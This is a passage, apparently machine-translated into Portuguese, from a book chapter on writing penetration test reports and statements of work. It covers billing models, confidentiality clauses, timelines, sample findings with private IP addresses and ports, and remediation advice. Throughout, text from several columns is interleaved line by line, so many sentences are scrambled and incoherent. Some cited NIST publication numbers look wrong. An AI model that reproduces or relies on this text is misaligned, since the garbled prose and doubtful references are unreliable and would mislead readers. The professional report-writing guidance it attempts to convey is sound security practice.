dinheiro em outras reas de Muitos mandatos do setor tm graves diretrizes semelhantes s normas, no por
tecnologia at que algo ruim acontece repercusses para no auditorias que entanto, nada obriga as pessoas a agncias governamentais e
causando reativa vo seguir prestadores de servios.
gastos. Torna-se ainda mais de multas a terminao do trabalho. los. Um exemplo o controle que
desafiador para oferecer servios que Alinhando suas entregas com as portas abrir em um firewall, em vez de [279]
avaliam existente normas obrigatrias usando a permitir que todos regra de
segurana, como um teste de uma opo forte para justificar a trfego. Penetration Test Relatrio Executivo
penetrao quando muitos clientes aquisio de seus servios.
tm problemas suficientes Termos que so importantes em Lei de Gesto de Segurana da
relao ao cumprimento da indstria Os padres da indstria Informao Federal (FISMA) /
so as seguintes: Nacional
Instituto de Padres e Tecnologia divulgaes de empresas e evitar a incidentes imprevistos. situao, recomendamos trabalhar
(NIST): A FISMA e NIST especial fraude contbil. [280] com os clientes sobre como solicitar
800-153 e 800-137 publicaes condies especficas
fornecer um quadro abrangente para Captulo 8 e condies que apenas candidatos
garantir a eficcia dos controles de Os clientes tendem a inclinar-se para qualificados poderiam se encontrar,
segurana da informao sobre os Servios profissionais servios chave na mo com base na para forar um equilbrio de melhor
recursos As estratgias mais comuns para capacidade de planejar valor e custo como uma mtrica de
que suportam as operaes e ativos cobrar os clientes para os servios para os custos esperados. Os clientes premiao.
federais. so Turnkey e hora e podem concentrar-se em atingir os O outro mtodo comum de servios de
North American Electric Reliability Relevante. Turnkey, todos os servios resultados esperados da faturamento tempo e materiais.
Corporao (NERC): Desenvolveu tm um custo conjunto que s pode servios solicitados e prestadores de Tempo e
obrigatrio Proteco das Infra- (CIP), ajustar se os servios servios espera quando responsvel Propostas Materiais cobrar por horas
normas de segurana ciberntica so solicitados fora do acordado tarefas no so de utilizao. Normalmente, os
para proteger os cibernticos ativos escopo do trabalho. Normalmente, completou, sem incorrer em custos de prestadores de servios ir listar
essenciais que controlam ou afetam a modificaes para um trabalho adicionais. Grandes diferentes preos por hora para as
confiabilidade do Engajamento Turnkey exigem um organizaes, como os EUA categorias de faturamento, tais como
Sistemas eltricos em massa norte- pedido separado para a mudana que governo federal so conhecidos por Gerente de Projetos pode ser 100
americano. Aprovado pelo Energia o cliente deve solicitar servios Turnkey em formais dlares por hora, mas um engenheiro
Federal aceitar antes da incluso cobrana Pedidos snior de 200 dlares por hora.
Comisso Reguladora (FERC), o adicional. para saber o Preo (RFP) postagens comum que
cumprimento destes padres Servios Turnkey colocar o risco de pblicas. Na maioria das situaes, h servios a serem divididos em ordens
obrigatrio para todas as perder a rentabilidade do fornecedor orientaes escritas de servio com horas esperados para
organizaes envolvidas com a granel de servios, porque pelo escritrio de compras para ajudar o cliente
do pas eltrica custo no ajusta independentemente determinar quem ser concedido o preparar-se para os encargos
rede. da quantidade de trabalho necessria engajamento baseado previstos, o projeto continua.
Payment Card Industry Data Security para atender o escopo de de fatores como melhor valor, preo e Time and Materials coloca o risco de
Standard (PCI DSS) e Pagamento trabalho. Isto significa que o prestador itens de reunio necessrio. Vimos servios de alto custo para o cliente,
Aplicao de Segurana de Dados de servios tem a oportunidade de RFPs porque
Padro (PA-DSS): Estas so as executar tarefas sob sair pela culatra quando o escritrio de servios que superem as ordens de
normas para tempo proposto igualando lucro compras seleciona servios baseados servio continuam a ser cobrado. O
organizaes que lidam com adicional. Isso tambm poderia sair exclusivamente em melhor preo. Em benefcio para os clientes
informaes do titular do carto para o pela culatra quando os servios Nalguns casos, os servios de maus eles podem ser capazes de gastar
dbito principal, de crdito, exceder o custo do trabalho. por causar mais problemas do custo e menos, se eles podem possuir parte
pr-pago, e-bolsa, ATM e cartes de isso que absolutamente essencial vrias vezes mais altas do trabalho, bem como evitar a
POS. para definir um realizveis para remediar do que a oferta de horas de enchimento extras comuns
Lei Sarbanes-Oxley (SOX): Ele exige escopo de trabalho para os servios melhor valor anterior. Para ajudar os acusados de uma proposta Turnkey. A
reformas rigorosas para melhorar propostos, com algumas horas de clientes a evitar este desvantagem para
financeiro preenchimento adicionais utilizados
para
clientes o prestador de servios no Documentao est a ter tanto um escritor de edio exemplos para o cumprimento das
incentivado a terminar o projeto e O desenvolvimento de um produto tcnica e profissional do projecto para metas de formatao de uma forma
poderia final pode ser dividida em alguns se certificar de que profissional.
atrasar a concluso. estgios, tal como mostrado no endereos tanto necessidades de [282]
Como um profissional prestador de seguinte pessoal tcnico e executivo.
servios, recomenda-se a apontar diagrama. O primeiro estgio o Projeto Captulo 8
para o desenvolvimento de um Projeto de Reviso. Este o lugar Reviso Capa
Servios Turnkey oferta como voc onde o prestador de servios Informaes A pgina de rosto em um mnimo ir
construir uma prtica. Prticas bem comentrios Coleo fornecer um nome de relatrio, verso,
definidos pode definir a declarao de trabalho, objetivos de Primeira Verso data, autor, servio
expectativas adequadas com clientes negcio do cliente, reas de interesse, Comente e nome do fornecedor, eo partido
para evitar nos servios de escopo e props finalizao pretendia. As folhas de rosto tambm
esperado. No nosso valor para fornecer. Tudo isso mais o Um escopo de trabalho deve sempre pode listar os itens adicionais, tais
experincia, os clientes no tm tales material identificado adicional usado contabilizar horas necessrias para como a classificao de segurana de
de cheques em branco para os para construir um criar documentos ou de destaque os
servios, e desejo um conjunto modelo de relatrio. documentao. Normalmente 60 por resultados de outras sees.
custar antes de solicitar para o O prximo passo o preenchimento cento do tempo relatrio escrita ser Declarao de Confidencialidade
oramento. do modelo de relatrio durante a fase utilizado para o projecto, e reviso de As informaes obtidas durante a
Periodicamente, os clientes podem de Coleta de Informaes. documentos e assinar projeto ir maioria dos servios de penetrao
solicitar para substituir membros A informao capturada inclui utilizar o ser
faturveis com a sua dispositivos identificados, processos restantes horas. Certifique-se de sensvel. fundamental para
pessoal para reduzir o custo total do utilizados, vulnerabilidades calcular o ciclo de vida do documento identificar o nvel de segurana
projeto. Por exemplo, um cliente pode encontrado, verificao de em sua esperado para proteger informaes
pedir para vulnerabilidades, sugeriu remediao, cronograma do projeto, para evitar capturados durante o trabalho, bem
usar um gerente de projeto interno e outros dados. perda de receita. como o nome que permitido para ver
para o planejamento. Este introduz o Uma vez que todos os dados so Formato do relatrio como
risco de capturados e alinhado com o modelo, Independentemente do tipo de projeto, dados. Certos nveis de folga pode
no gerir adequadamente os recursos, a terceira fase a preparao h alguns itens que devem ser exigir tratamento especial ou em
o que poderia levar a problemas e um primeiro esboo. Este projecto no includos locais protegidos
causa ser voltado para clientes e conter o em servios de documentos de para o armazenamento, tais como um
horas excessivas que vai comer fora mximo de dados resultado final. Todos os documentos Sensitive Information Facility
em lucros esperados. Recomendamos possvel. ltima a fase de reviso, devem explicar o seu propsito, Compartmented (SCIF) para
evitar estas situaes, porque difcil usada para emagrecer o relatrio com anunciar a sua marca, identificar as armazenamento de material
de controlar um membro da equipe os dados mais forte partes envolvidas, o trabalho lista que classificado. Violaes de privacidade
que no diretamente parte de sua juntamente com o ajuste para atender foi realizada, e de dados pode ter financeira, marca e
organizao. s demandas de negcios de uma Concluo com um resultado esperado. repercusses legais.
[281] forma profissional. Melhores prticas Esta seo ir fornecer algumas dicas Uma declarao de confidencialidade
e deve explicar qual o nvel de
Penetration Test Relatrio Executivo segurana est envolvido com
o documento, que est autorizado a proibida. Jeff Mills As fases de apresentao da fase de
v-lo, o que eo que no permitido Exemplo 2: Declarao de Comentrios lanamento do projeto e remediao
ser copiado, os direitos de Confidencialidade Criado so fases obrigatrias
distribuio, e outra linguagem Esta informao confidencial est Revisado para todas as outras fases.
jurdica. Recomendamos que voc sendo fornecido ao PRESTADOR DE Revisado [284]
tenha SERVIOS como 5/10/13 Mark Farina
um indivduo com um fundo legal entrega deste trabalho de consultoria. Timeline Captulo 8
desenvolver a sua confidencialidade O nico propsito deste documento Timelines fornecer uma estimativa de Fase Engagement
padro fornecer ao cliente com os resultados horas para cada fase de um projeto. Projeto Kickoff Meeting
Declarao. e recomendaes deste compromisso. Timelines deve Tarefa (nvel alto)
Exemplo 1: Declarao de Cada destinatrio concorda que eles incluir o nome de fase, tarefas a Demonstrao do trabalho de reviso.
Confidencialidade vo seguir as restries de serem concludas, e durao prevista Configurao Deliverable. Negcio
Este documento contm informaes distribuio de acordo com a para essa fase. e Q tcnico + A, Boundry reviso.
confidenciais e privilegiadas do o acordo entre este agente consultoria Normalmente, a durao exibido em Pr-requists
servio e prestador de servios. horas faturveis para que o cliente Ferramenta de preparao e
FORNECEDOR. A informao [283] pode estimar o instalao.
destinado para uso privado do cliente custo para cada fase do projeto. Footprinting, reviso de polticas,
para a sua Penetration Test Relatrio Executivo Recomenda-se a incluir a lngua para mapeamento.
compreenso do estado atual da Controle de documentos a qual Digitalizar para dispositivo. Reviso
segurana da sua organizao. Ao importante listar qual a verso e fases so obrigatrias para evitar existente
aceitar edies so feitas a uma proposta de pedidos para remover as fases infra-estrutura de rede
Neste documento, O CLIENTE entrega. crticas, como o projeto Durao Estimada
concorda em manter o contedo deste Provavelmente, muitas pessoas com kickoff. 8 Horas
documento em uma variedade de conjuntos de Veja a seguir um cronograma Avaliao de Rede
confiana e no copiar, divulgar, ou habilidades ir rever um documento. estimado e plano de implementao 16 Horas
distribu-lo para todas as partes, Mudanas de rotulagem com as datas de alto nvel: 32 Horas
excepto os e tipo de modificao vai ajudar os Rrovider Servio comear este Teste de Invaso
que ir fornecer servios e / ou leitores alavancar o compromisso de iniciar duas semanas Sistema que pode ser identificar
produtos diretamente aos clientes, verses mais recentes. depois de receber o explorados e executar teste caneta
como resultado de Histria do Documento assinado declarao de trabalho sobre
as recomendaes deste documento, Verso (SOW), e da ordem de compra do sistemas de destino.
sem pedido por escrito para e por 1 cliente sujeita a recurso Anlise de relatrios, recomendaes
escrito 2 disponibilidade. Se o cliente solicita e apresentaes
confirmao do servio de provedor. 3 um compromisso data de incio 32 Horas
Se voc no for o destinatrio Data acelerado, este deve 16 Horas
pretendido, ser 5/1/13 ser negociado com Provedor de 6 Horas
ciente de que qualquer divulgao, 5/24/13 Servios, Gerenciamento de Projetos, 2 Horas
cpia ou distribuio deste documento Autor (es) e conta Team. Remediao Apresentao
ou de suas partes Josh Wink
Constatao atual e impacto de foi realizado para identificar possveis usado, e como voc lida com as
segurana Penetration Test Relatrio Executivo vulnerabilidades e fornecer acionvel ameaas identificadas. comum para
anlise, incluindo recomendaes Este projeto incluiu testes de recomendaes sobre remediar as desenvolver diagramas
Projeto fechar penetrao de nove (9) os hosts vulnerabilidades para fornecer uma apresentando fluxo de processos e
Resumo executivo internos. Para o teste, maior estruturas de relatrios de recursos
O objetivo de um relatrio executivo PRESTADOR DE SERVIOS focada nvel de segurana para o meio para esta seo.
fornecer uma viso geral de alto nvel no seguinte: ambiente. [286]
de servios por que PRESTADOR DE SERVIOS usado
Foram realizados. Os resumos Tente determinar o que as sua metodologia Teste de Invaso Captulo 8
executivos deve cobrir o que o levou vulnerabilidades de nvel de sistema provado As certificaes podem ajudar a
at a questo ser poderia ser descoberto avaliar a segurana dos sistemas e mostrar a capacidade de um provedor
abordados, a situao problemtica, e e explorados sem o conhecimento identificar potenciais falhas de de servios para proporcionar
proposta de soluo com resultados prvio do ambiente ou notificao ao segurana. qualidade
esperados. administradores. Exemplo 2: Sumrio Executivo resultados. Existem certificaes que
Relatrios executivos no exigem Tentar explorar vulnerabilidades PRESTADOR DE SERVIOS AO destacam a capacidade da empresa
detalhes tcnicos e devem visar a encontradas e acesso a informao CLIENTE empenhado para realizar de seguir comprovada
liderana, em vez confidencial uma penetrao da rede metodologia de fluxo de negcios, tais
de pessoal tcnico. que podem ser armazenados em Teste em um nmero quantificado de como a Organizao Internacional
Exemplo 1: Sumrio Executivo sistemas. sistemas em sua rede. Estes sistemas para
Background: Documentos e relatrio sobre todos os foram Normas certificaes (ISO) (Por
CLIENTE envolvidos PRESTADOR achados. identificados pelos nmeros de host exemplo, ISO 9001 ou 14001). Outras
DE SERVIOS para realizar uma 192.168.1.x, 10.1.1.x, e 172.16.1.X. A certificaes
avaliao de vulnerabilidade finalidade poderia ser focado em uma tecnologia
e teste de penetrao de seus Todos os testes levaram em desse compromisso foi o de identificar especfica, como tendo engenheiros
sistemas. A finalidade do acoplamento considerao os processos de e priorizar as vulnerabilidades de certificados para
foi avaliar o negcios reais implementadas pelo segurana no instalar a tecnologia que est sendo
segurana das redes e sistemas de sistemas e suas ameaas em sistemas identificados. O engajamento solicitado. Certificaes de testes de
clientes, identificando possveis falhas potencial e, portanto, os resultados foi lanada em [START DATE] e penetrao so Popular
de segurana desta avaliao refletem uma incluiu o Certified Ethical Hacker (CEH) e
neles, utilizando comprovada imagem realista dos nveis reais de quatro (4) dias de testes, anlise e GIAC Penetration Tester (GPEN), que
metodologia de testes SERVIO do exposio a hackers online. documentao. ajudar a qualificar os recursos que
provedor. O projeto Este documento contm os resultados Metodologia esto sendo contratados.
foi realizada em um nmero de dessa avaliao. altamente recomendvel para Por Exemplo: Metodologia
sistemas em segmentos de rede do Informaes sobre o projeto: fornecer uma viso geral de como PRESTADOR DE SERVIOS usado
cliente, um O principal objetivo desta avaliao foi voc entregar servios. personalizado e ferramentas
equipe de especialistas do provedor o de fornecer uma anlise de Destaques deve incluir o seu processo disponveis publicamente para ganhar
de servio durante a data de segurana para cada fase de um noivado, perspectiva de
admisso. falhas presentes em redes e sistemas ferramentas
[285] do cliente. Esta avaliao
postura de segurana da rede do Esta seo aborda detalhes do permitir a transferncia e execuo de [288]
ponto de vista de um hacker. Estes envolvimento de servios. O pblico- arquivos. Um invasor com este nvel
mtodos proporcionam alvo de acesso seria Captulo 8
CLIENTE com uma compreenso dos Normalmente o pessoal tcnico, eo ser capaz de interromper todos os Endereo IP
riscos que ameaam a sua objetivo fornecer o mximo de processos de negcios que dependem 192.168.10.20
informao, e informaes desse host. 192.168.10.23
tambm os pontos fortes e fracos de possveis reas de preocupao em PRESTADOR DE SERVIOS tambm Hostname
seus controles atuais protegendo torno identificados. Os clientes podem foi capaz de usar o Server Message SERV001
esses sistemas. querer desafiar um Block (SMB) Null SERV542
Os resultados foram alcanados e item realado e repita os passos Conta de usurio para enumerar os Portas TCP
exigido pelo perfil de redes internas utilizados para validar a nomes de contas de usurios e grupos 42,53,88,135,139,445,464,53,636,102
CLIENTE vulnerabilidade, ou seja, do nome de domnio 5,1
usando informaes publicamente eles querem saber como as coisas Server (DNS). Um invasor pode usar 071,1075,1145
disponveis, o mapeamento da so descobertas, acessados e esta informao para ataques de 135,139,445,1433,3300
arquitetura de rede, identificando explorados. Estes dados phishing direcionados 135,139,445,1433,3389
hosts e servios, rede enumerando e tambm verifica todas as reas de sobre os trabalhadores do cliente ou 80,135,139,445,1443
vulnerabilidades de nvel de sistema, rede solicitados rotulados no mbito para conduzir ataques de adivinhao 135,139,445,1433,1434,3372,3389,50
descobrindo anfitries inesperados do trabalho ter sido de senhas fora bruta. 22,
dentro do ambiente e eliminando falso enviada pelo prestador de servio. Um atacante que ganha credenciais 8400,8402
positivos que pode ter surgido a partir Normalmente, os assuntos a serem administrativas com sucesso para 135,139,445,1433,1434,3372,3389,50
de digitalizao. includos so alvos descoberta, criar outro usurio 22,
DISCOVERY mapeamento, a vulnerabilidade contas e atribu-los a atingir as 8400,8402
Avaliar e avaliao, anlise da arquitetura, funes corporativas poderia usar 80443
Educar explorando, e relatrios. At que ponto informaes de usurios. 80
Alvos de mapeamento um servio No geral, os resultados identificar 192.168.10.154 SERV239
Remediar provedor vai em qualquer rea ameaas que podem ser mitigados 192.168.10.204 SERV777
Teste de Invaso baseada no que a declarao de atravs de dispositivo simples / 172.18.10.100
Metodologia trabalho define como o foco definies de configurao de 172.18.10.101
AVALIAO do noivado. software, juntamente com polticas de 172.18.10.105
Lockdown Por exemplo, apoio. 172.18.10.200
Alvos PRESTADOR DE SERVIOS foi A avaliao da vulnerabilidade e SERVSQL123
SEGURO capaz de acessar o host legado EMR testes de penetrao resumo: SERVSQL124
Alvos da Auditoria usando o padro CLIENTE desde PRESTADOR DE database.intern.com
[287] credenciais de administrador do SERVIOS com os oito (8) endereos corp.com
sistema para MS SQL. Esse acesso IP so listadas Resumo dos resultados
Penetration Test Relatrio Executivo nos permitiu criar um na tabela a seguir. Esta gama foi O Resumo das concluses a carne
Procedimentos de teste detalhadas conta de administrador, expor os digitalizada para determinar as portas por trs da proposta. Este o lugar
processos do sistema, contas de e servios abertos onde os resultados
usurio, arquivos de banco de dados e execuo nos hosts relacionados.
dos servios so explicados, incluindo Crtico: Ameaa imediata para os Digitalizao TypeTotal explicando o problema com o fluxo de
a forma como os itens identificados processos-chave de negcios Hosts trfego capturado que os clientes
podem impactar negcios. Alta: Ameaa indireta a chave Portas possam qualificar o
Como estes resultados so processos de negcio / ameaa de 9 recomendao.
formatados vai determinar a reao do secundrio TCP UDP 1-65535, Alguns detalhes que poderiam ser
seu cliente, por isso no processos de negcios Gravidade da Vulnerabilidade includos para vulnerabilidades
consciente de no s o que dito, Meio: Indireta ameaa / parcial aos Crtico identificadas em um relatrio de
mas tambm a forma como os dados processos de negcio Mdio entrega
so apresentados. Baixa: No existe nenhuma ameaa Baixo so como se segue:
A melhor prtica , incluindo uma direta; vulnerabilidade pode ser Total
classificao de risco para ajudar os alavanca com outro 1 (nico: 1)
clientes a entender como reagir vulnerabilidades 2 (singular: 2)
aos itens identificados. Caractersticas [289] 2 (singular: 2) Nome Vulnerabilidade
de classificao comum a nico definida como o nmero de Criticidade do negcio
probabilidade, avaliao do risco, Penetration Test Relatrio Executivo diferentes vulnerabilidades encontrado Descrio Vulnerabilidade
grficos, esquemas de cores e assim O nvel de risco atual de sistemas dentro de um nvel de risco. Por [290]
por diante. Recomendamos incluindo testados, com base no nvel de risco exemplo, se cinco vulnerabilidades de
tanto um grfico de resumo mais elevado dos resultados obtidos alto nvel foram Captulo 8
e seo detalhada sobre todos os em encontrado, mas trs so original, do
itens identificados individualmente. sistemas crtico durante o ensaio, que algumas das vulnerabilidades so
Para fazer backup de suas um total de um (1) Crtico, dois (2) apresentar em mais de um sistema.
descobertas, Mdio, e Vulnerabilidades
melhor prtica ter referncias a dois (2) Baixo vulnerabilidades foram Vulnerabilidades encontradas deve Detalhes tcnicos
fontes pblicas sobre por que o ativo identificadas como mostrado na incluir uma descrio clara sobre a Os sistemas afetados
identificado tem uma imagem seguinte: origem do Portas afetadas
questo para validar ainda mais a sua Vulnerabilidade fraqueza, impacto nas operaes de Ao recomendada
reivindicao. As fontes pblicas Vulnerabilidade A negcios e probabilidade de ser [291]
poderia ser violaes em Vulnerabilidade B explorado. Relatrios
conformidade, Vulnerabilidade C tambm deve listar como a Penetration Test Relatrio Executivo
no encontrando um padro Vulnerabilidade D vulnerabilidade foi identificada Pode haver concluses gerais que
mandatada ou explicao de uma Vulnerabilidade E juntamente com, se ele foi validado, voc gostaria de incluir alm
vulnerabilidade conhecida de um Gravidade significado foi a vulnerabilidade vulnervel
fonte respeitvel. Crtico explorada ou apenas identificada sistemas para mostrar valor adicional.
Exemplo: Mdio como uma possvel vulnerabilidade Por exemplo, existe uma ordem que
Mdio durante uma verificao. toda EUA
Baixo Vulnerabilidades na arquitetura de um agncias federais tm equipamentos
Baixo cliente pode incluir um diagrama capazes de suportar IPv6. No tendo
Mesa de vero para os resultados da este no
avaliao
necessariamente uma vulnerabilidade, Esta seo explica as recomendaes ou coberturas esto includos os segurana da rede por meio de
no entanto, algo que um cliente para remediar itens encontrados de servios de correios. Os clientes que aquisio de nossos servios. Devido
federal dos EUA seria servios no conseguem uma auditoria ao impacto da geral
interessado em saber. Outro exemplo fornecida. Recomendaes podem pode assumir os seus servios organizao como descoberto por
seria apoiar as futuras tecnologias, variar de sugestes de alto nvel, anteriores so responsveis se voc este teste de penetrao, os recursos
tais como capacidades para Voz sobre como "remendo no indicar seu adequados
IP (VoIP) e vdeo. este sistema ", a passos muito servios, no garantem reunio recomendado para ser alocada para
A seguir est uma lista de sugestes detalhados para fechar uma mandatos ou necessidades assegurar que os esforos de
de itens para incluir em servios de vulnerabilidade. Algumas medidas de especficas. reparao so efectuadas
Teste de Penetrao de remediao Por exemplo, existe uma grande em tempo hbil. Apesar de uma lista
mostrar o valor adicional: poderia afetar outros servios, como diferena entre ter um relatrio PCI abrangente de itens que devem estar
fechar as portas para defender de um includo com servios, em implementado est fora do mbito do
ataque especfico, comparao com a contratao de um presente compromisso, alguns itens
que tambm incapacita outro sistema especialista na verdade PCI de alto nvel so
que utiliza esse canal para na reviso de todos os aspectos do importante mencionar.
comunicao. Ele regulamento com a rede do cliente,
importante incluir advertncias de em um mtodo semelhante ao Implementar um programa de
possveis impactos negativos com utilizado pelos auditores. gerenciamento de patch: Muitas das
qualquer sugeriram H muitos nveis de remediao. Por vulnerabilidades identificadas
remediao, juntamente com a vezes, como a rede de arquitectura poderiam ser evitados com o
Diferena em configuraes de confirmao de que os passos expe uma fraqueza, mas outras gerenciamento de patches adequada.
arranque e de funcionamento para previstos no garantem para corrigir o vezes uma lacuna na poltica, Recomendamos seguinte
dispositivos problema ou trazer um sistema em configurao ou as orientaes descritas no NIST SP
Desvio Melhores prticas conformidade com a regulamentao remendo faltando. Os itens a incluir, 800-408 como uma fonte para o
Suporte para IPv6 especfica. A ltima coisa por recomendaes so resumo das desenvolvimento de
Fim de venda ou de final de voc iria querer um cliente que est concluses, polticas de segurana para
dispositivos de vida sendo comprometida servios de de alto nvel e detalhadas gerenciamento de patches adequada.
O suporte para as capacidades correios e ponto culpa recomendaes para remediao, Isto ir reduzir o risco de
necessrias para VoIP e vdeo em voc por no fornecer etapas de outros dados teis execuo de sistemas vulnerveis.
Conformidade com normas comuns, correo de sucesso para uma fora de itens solicitados, tais como as Impor controle de mudanas em todos
como FISMA, PCI vulnerabilidade identificada capacidades de IPv6, mudanas no os sistemas: As vulnerabilidades
Lista de nmeros de srie, endereo durante seus servios. projeto da rede, comuns so
IP, MAC, e assim por diante de [292] recomendaes de hardware, causado por erro humano. Muitos
dispositivos encontrados software, patches e resumo problemas de configurao incorreta
Topologia de rede Captulo 8 cumprimento. poderia ser evitado
Protocolos disponveis e dos dados muito importante afirmar em um Exemplo: atravs de uma mudana forte e
virado pblico relatrio que garante entrega Louvamos ao cliente para ser pr- processo de controlo em todos os
Consideraes de rede e de ativo na gesto de risco de tecnologia sistemas activos
recomendaes e
Multifatorial Alavancagem e controle estado de risco para a organizao. Um listas anexas informaes documentos incluem o seguinte:
de acesso baseado em funo: Alguns Consulte NIST SP 800-309 para obter adicionais relacionadas com o
sistemas crticos orientaes sobre relatrio entrega tipicamente Relatrio Executivo: Um resumo de
Foram encontrados alavancando a funcionamento de um programa eficaz no essencial para as principais alto nvel do trabalho que voc est
segurana da senha como os nicos de gesto de risco. concluses. Isto para fins de fazendo, o que
meios de validar Incluir alta disponibilidade para referncia e pode conter voc espera realizar, e seu pblico-
pessoas autorizadas. A melhor prtica sistemas crticos e redes: Durante a resultados da verificao, screenshots alvo ..
ter, pelo menos, duas formas de nossa capturados, e outras informaes. Exemplo de SOW sumrio executivo
autenticao, juntamente com a avaliao, encontramos pontos nicos Apndice 001 - Relatrios de a seguinte:
limitao do acesso conta de de falha para sistemas de misso varredura de vulnerabilidades Nessus O prestador de servios tem o prazer
administrao. crtica. <Captured Nessus Relatrio Printout> de apresentar o cliente com a nossa
Restringir o acesso a sistemas A melhor prtica o desenvolvimento Glossrio metodologia para a realizao de uma
crticos: Sistemas crticos devem ser de opes de failover em caso de Um glossrio usado para definir o avaliao de segurana. O principal
isolados a partir de falha na rede. significado dos termos utilizados na objetivo da
outros sistemas usando listas brancas, Um exemplo para um melhor trfego proposta. Isso poderia CLIENTE para iniciar este
ACLs, VLANs e outros meios. O para o datacenter do ncleo a ser para definies tcnicas, compromisso o de avaliar o nvel
projeto adio de especificando os requisitos atrs atual de risco
conceito de privilgio mnimo vai sistemas redundantes para a rede de conformidade referenciados e exposio adequadamente dentro
limitar a quantidade de dano que um centros de dados, como mostrado termos, ou outras reas que podem da organizao, tendo em vista o foco
atacante pode abaixo. precisar de mais esclarecimentos. de desenvolver
provocado usando um recurso Adicionais de Alta Disponibilidade [294] e / ou implementao de solues que
comprometida. Consulte NIST SP Equipamento ajudaro a reduzir as ameaas crticas
800-27 RevA11 para VRRP Captulo 8 e, finalmente,
orientaes sobre a obteno de uma Interruptor Declarao de Trabalho (SOW) mitigar o risco relevante.
linha de base de segurana para Servidores Antes de oferecer servios de Em resposta s necessidades do
sistemas de TI. NAT penetrao, pode ser necessrio cliente, servio provedor tem
[293] Firewall escrever uma Declarao de Trabalho delineado um
VRRP (SOW) que descreve o trabalho que estratgia de avaliao de segurana
voc est indo para executar. Este eficaz, que tem provado ser muito
Data Center normalmente o primeiro passo bem sucedido em
Interruptor voc gostaria de completar com seus elevar a postura de segurana em
Penetration Test Relatrio Executivo Servidores stakeholders antes de iniciar um muitas organizaes similares. Nossa
VRRP projeto. abordagem comea
Realizar avaliaes de vulnerabilidade NAT Ao escrever um SOW, recomendamos com a compreenso dos requisitos de
regulares: As avaliaes de Firewall que voc siga um formato que negcio relacionados com a avaliao,
vulnerabilidade VRRP acabar seguido por um mapeamento
deve ser realizado numa base regular, Apndices representar a sua estrutura de detalhado topologia e base-
como um meio para validar o actual Exemplo: comunicao. O formato bsico de revestimento do existente
uma Declarao de Trabalho
infra-estrutura para ser identificado no negcio consistente para avaliar e Relatrio de atividades: Um relatrio passos que voc est disposto a
escopo. Aps a concluso da melhorar o de todas as faanhas executadas tomar durante o seu ataque. A DT
descoberta do postura de segurana de uma (disponvel em trs tambm define quando voc
infra-estrutura, comeamos uma organizao continuamente, e nveis de detalhe). vai parar de teste ou que
avaliao de vulnerabilidade acreditamos que este compromisso Hospedar relatrio: Informaes de circunstncias esto fora do escopo.
sistemtica de sistemas crticos e vai ajudar na reduo de despesas host detalhada, incluindo o nmero de Em outras palavras, a porca
dispositivos de rede para identificar operacionais de riscos minimizados e computadores comprometidos, o d-lhe um ponto de parada.
vetores de ameaas que podem ser tempo de inatividade, enquanto nmero mdio de vulnerabilidades O prximo exemplo mostra um resumo
de natureza comportamental. Um tambm fornecendo proteo de explorados em cada computador, e os Teste de Invaso externa. Ele inclui
cuidado dados e de marcas de reputao nomes CVE de vulnerabilidades um
mtodo de explorao analisada e benefcios para o Cliente. encontrado em cada um dos viso geral do processo de teste,
executada para identificar a relevncia [295] computadores. seguido de um esboo com o passo-a-
da Relatrio de vulnerabilidade: Um passo
vulnerabilidades que foram Penetration Test Relatrio Executivo relatrio detalhado de explorar com Instrues de trabalho que ser
detectados. Tcnicas como a testes Alm disso, o conhecimento adquirido xito, contra realizada. Este exemplo tambm
de penetrao e a partir de tal exerccio fundamental potenciais vulnerabilidades em cada descreve o
engenharia social pode ser no planejamento para computador. cliente ea responsabilidade do
empregado durante esta fase. Por fim, servios futuros que permitiro a Do lado do cliente Relatrio de teste proprietrio do aplicativo.
passamos semanal realizao de negcios e de penetrao: A trilha de auditoria Teste web externo exemplo SOW:
briefings de status em todo o ciclo de rentabilidade. Esses benefcios completa de cada lado do cliente [296]
vida do compromisso de rever as sejam coerentes e bem alinhado com Teste de Invaso, incluindo o modelo
atividades os objetivos do cliente listado como de e-mail enviado, explorar lanado, Captulo 8
para a semana e comunicar metas e segue: resultados dos testes (sucesso ou O objetivo central do nosso esforo
objectivos essenciais para as falha), e detalhes sobre sistemas externo e Teste de Invaso web
prximas semanas. comprometidos. explorar
Isso proporciona cliente a Relatrio de usurio: Um relatrio de os pontos fracos do permetro da rede,
oportunidade de informar os nossos teste do lado do cliente dos quais links domnio web, web e de segurana
engenheiros de qualquer sistema foram clicados, quando inerentes
atualizaes em andamento que Obter uma melhor compreenso de eles foram clicados, e por quem. entrega de aplicativos. Elementos de
necessitam de ateno especial. potenciais vulnerabilidades da rede entrega de aplicativos adjacentes,
PRESTADOR DE SERVIOS CLIENTE incluindo back-end
fornece conhecimentos de gesto de e riscos de segurana bancos de dados e middleware,
projectos credveis para garantir a Determine crtico arquitetura de Teste de Invaso Externa tambm esto includos neste domnio
excelncia operacional e segurana fraqueza dentro do Uma ateno especial deve ser dada e so avaliados
uma experincia superior ao cliente CLIENTE ao Teste de Invaso do externo bem. As vulnerabilidades comuns e
em todos os nossos compromissos e infra-estrutura fontes. Um SOW Teste de Invaso exploits que concentrar-se durante
este no excepo. Avaliar a segurana associado com o externo identifica seu alvo e possvel esta fase
SERVIO DE FORNECEDOR site do cliente e
reconhece uma necessidade de aplicaes de revestimento exterior
so os relacionados a buffer Localizar endereos em PGP e Comunique-se a manuteno do Linha de Base
overflows, injees de SQL e cross- WHOIS bancos de dados. servio e / ou impactos durante testes Auditoria e
site scripting. Lanamento de vrios ataques de penetrao. Avaliar
Nossos engenheiros tambm podem simultneos, para acelerar o Teste de Garantir a acessibilidade da web para Segurana
envolver-se em um manual de Invaso domnios e dispositivos de permetro fraquezas
navegao do domnio web para processo. de alcance se no Polticas de Segurana
extrair outras peas de dados Interaja com mquinas comprometidas disponveis ao pblico. Normas
confidenciais e crticos. Alm disso, atravs de agentes discretos que [297] Remediao
conforme solicitado pelo esto instalados e
CLIENTE, dispositivos na DMZ apenas na memria do sistema. Penetration Test Relatrio Executivo Melhores Prticas
tambm ser includa neste Teste de Execute exploits locais para atacar Material adicional SOW Avaliar e
Invaso mquinas internamente, em vez de Educar
exerccio de uma tentativa de romper atravs do Outras reas a considerar quando se Risco
logicamente as defesas em torno da rede. escreve um escopo de trabalho deve Exposio
web Analisar aplicaes fora-de-the-box ser considerada. Alguns Lockdown
domnio de aplicao. web para costume, e o contedo comum recomendado para e
Procedimentos de teste detalhadas: falhas de segurana. incluir so os seguintes: Proteger
PRESTADOR DE SERVIOS ir Validar exposies de segurana Liberao Legal e testes: Geralmente
